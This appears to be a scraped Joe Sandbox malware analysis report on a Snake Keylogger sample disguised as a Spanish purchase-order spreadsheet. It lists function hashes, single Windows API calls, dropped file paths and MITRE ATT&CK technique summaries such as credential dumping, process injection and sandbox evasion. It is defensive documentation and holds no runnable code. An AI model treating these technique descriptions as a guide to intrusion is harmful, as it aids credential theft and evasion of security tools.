Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction ID: 4f153107e3d7fc08becbed60590de83d784dd83f7c38d7678aaebbbe621ecf79
Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction Fuzzy Hash: AC01D871950309AFEB25DFE4CC45BEDB7ECEB44224F1185ADE88697100DA39990087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0101E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 1a9827c00b5b9b5e36b4e83a8fa194cde909bcc505cfe37c3a297fcb67258728
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 28F02836510A269AD7333AA9DC08BDE37D99F5A2B4F000F56EDE1931D4CB7CE40186A5

Uniqueness

Uniqueness Score: -1.00%

Function 01024C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00FF1129,00000000,?,01022E29,00000001,00000364,?,?,?,0101F2DE,01023863,010C1444,?,0100FDF5,?), ref: 01024CBE

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2e9af3ce7d57740cd8bdeeb987c74a88f31bdc9cf17909b0bb9cd35700f3a52d
Instruction ID: 837d3083c9b8a40c30314c27fafbf64844cf4b1a0624784d0c1c03e05083cd08
Opcode Fuzzy Hash: 2e9af3ce7d57740cd8bdeeb987c74a88f31bdc9cf17909b0bb9cd35700f3a52d
Instruction Fuzzy Hash: B0F0E93160423DA7EBE15F6ED808B9A3BC8EF517B0B344166E9D9E7288CB75D40186E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4F6D

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c25341389a3f0eedcd805c8683f202488982b7c573a9f13f67fa6b12f28ab885
Instruction ID: 978750bc670099b814fcdc375c72333c7abef7f1e698ce8b0d672f3dc6b079c9
Opcode Fuzzy Hash: c25341389a3f0eedcd805c8683f202488982b7c573a9f13f67fa6b12f28ab885
Instruction Fuzzy Hash: 4CF03071505756CFDB349F64D490967BBF4AF14729310897EE2EE83560C731A844EF10

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE ref: 00FF2DC4

Part of subcall function 00FF6B57: _wcslen.LIBCMT ref: 00FF6B6A

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: d4f7e757683f6610e1dec4a65d5c8c28bedaa6511df80d6df5c86739f66b929d
Instruction ID: 99e495a7562ee1ab65ab6dc75ea2ad6422e53de6a8ae2569c7a77b735d811259
Opcode Fuzzy Hash: d4f7e757683f6610e1dec4a65d5c8c28bedaa6511df80d6df5c86739f66b929d
Instruction Fuzzy Hash: F0E0C272A042285BCB20A2989C05FEA77EDDFC8790F0400B1FE49E724CDA74AD8086A0

Uniqueness

Uniqueness Score: -1.00%

Function 01062693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 010626B5

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 39dc5d2215de47465198fba1d0431ca5d322c9b0a3ce8f54e509c075237d0782
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: C5E04FB0609B005FDF395A2CA8517F677E89F49300F10086EFADF93252E57268458B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FF3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FF3908

Part of subcall function 00FFD730: GetInputState.USER32 ref: 00FFD807

SetCurrentDirectoryW.KERNEL32(?), ref: 00FF2B6B

Part of subcall function 00FF30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FF314E

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: f7657b68e522510b7305a33d1ea771b0204125175907dcb3041e06b31d83164d
Instruction ID: abebe57a217dc77f3e54146bc607fad8e3ea607e357b9fbda5f0cbc2fa9a2af6
Opcode Fuzzy Hash: f7657b68e522510b7305a33d1ea771b0204125175907dcb3041e06b31d83164d
Instruction Fuzzy Hash: 6BE0DF3260820C06CA04BB3098125BDB3599FD1252F40143EF38242173CE2D8645A311

Uniqueness

Uniqueness Score: -1.00%

Function 001908E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 001908EB

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: b56048b1f4f79ce6928199f546885e1a99655e60a01f4491d38ff82d841d5c7c
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: BFE08C71A0520CEFEF25CBB88808AA977B8DB08320F104658E91AC3281D6308E40A694

Uniqueness

Uniqueness Score: -1.00%

Function 001908B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 001908BB

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 26a6f1c3c698ae263438eba95d7c69ba28fd61c4b9687349bb249a44303876a7
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 03D05E30E0620CABCB10CAA49804A9A73A89B08320F108754E91593280D63199409790

Uniqueness

Uniqueness Score: -1.00%

Function 0103039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,01030704,?,?,00000000), ref: 010303B7

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e4d0f236792991fbc11c3b96bd51036dc688c41300c131f98e578e9e0a8dee9f
Instruction ID: d7b574ce2998457d26a63b2c3fdfd7b8804e774b3a7ce88166dc261cac95c6c7
Opcode Fuzzy Hash: e4d0f236792991fbc11c3b96bd51036dc688c41300c131f98e578e9e0a8dee9f
Instruction Fuzzy Hash: 4FD06C3204010DBBDF128E84DD46EDA3BAAFB48714F014000BE5856020C736E821AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00192300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00192311

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 928fddb83e9d1a7ff5808641c03a6ef6c9104c1f224111c55cf3e0cc934d5bb3
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 4BE0BF7494010DAFDB00EFB4D5496AE7BB4EF04301F100561FD0192280D7309A508A62

Uniqueness

Uniqueness Score: -1.00%

Function 001929BB Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001929C7

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: f270ebcaac59cc56f274bf2b9a4993adbf3a33633fac7b4906b7d75e97b86e1d
Instruction ID: 8c140f89233f66b102fa268125dc0f928b204d1aecf41470ebe721c69a2c5f92
Opcode Fuzzy Hash: f270ebcaac59cc56f274bf2b9a4993adbf3a33633fac7b4906b7d75e97b86e1d
Instruction Fuzzy Hash: 93C04C7AF40108A7DB10DAE9ED4AFDDB3B8EB58711F204266FA00E7280D6B169158B94

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Orden de compra 0001-00255454.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T76434567000[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe

C:\Users\user\AppData\Local\Temp\atule

C:\Users\user\AppData\Local\Temp\aut187.tmp

C:\Users\user\AppData\Local\Temp\aut1C6.tmp

C:\Users\user\AppData\Local\Temp\aut3C55.tmp

C:\Users\user\AppData\Local\Temp\aut3C94.tmp

C:\Users\user\AppData\Local\Temp\aut761A.tmp

Windows Analysis Report
Orden de compra 0001-00255454.xlam.xlsx

Function 035306F5 Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

